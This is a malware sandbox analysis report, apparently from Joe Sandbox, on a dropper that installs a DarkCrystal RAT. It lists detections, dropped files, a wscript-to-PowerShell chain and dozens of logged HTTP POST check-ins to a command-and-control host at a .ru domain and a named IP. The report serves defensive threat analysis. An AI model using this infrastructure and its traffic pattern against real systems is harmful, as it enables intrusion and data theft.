                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeJoe Sandbox ML: detected
                                    Source: C:\hyperContaineragent\Bridgecommon.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\EEEoXuLc.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeJoe Sandbox ML: detected
                                    Machine Learning detection for sample
                                    Source: 3AAyq819Vy.exeJoe Sandbox ML: detected
                                    Source: 3AAyq819Vy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\hyperContaineragent\Bridgecommon.exeDirectory created: C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exeJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeDirectory created: C:\Program Files\Internet Explorer\en-GB\039065625c59a1Jump to behavior
                                    Source: 3AAyq819Vy.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 3AAyq819Vy.exe
                                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.pdb source: Bridgecommon.exe, 00000005.00000002.1911325001.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp

                                    Spreading

                                    barindex
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CAA69B
                                    Source: C:\Users\user\Desktop\3AAyq819Vy.exeCode function: 0_2_00CBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CBC220
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\hyperContaineragent\Bridgecommon.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                                    Software Vulnerabilities

                                    barindex
                                    Suspicious execution chain found
                                    Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                    Networking

                                    barindex
                                    Suricata IDS alerts for network traffic
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 37.44.238.250:80
                                    Source: Joe Sandbox ViewIP Address: 37.44.238.250 37.44.238.250
                                    Source: Joe Sandbox ViewASN Name: HARMONYHOSTING-ASFR HARMONYHOSTING-ASFR
                                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49730
                                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49767
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 137804Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1016Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1016Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1016Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1016Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1284Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1264Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 861848cm.nyashkoon.ruContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
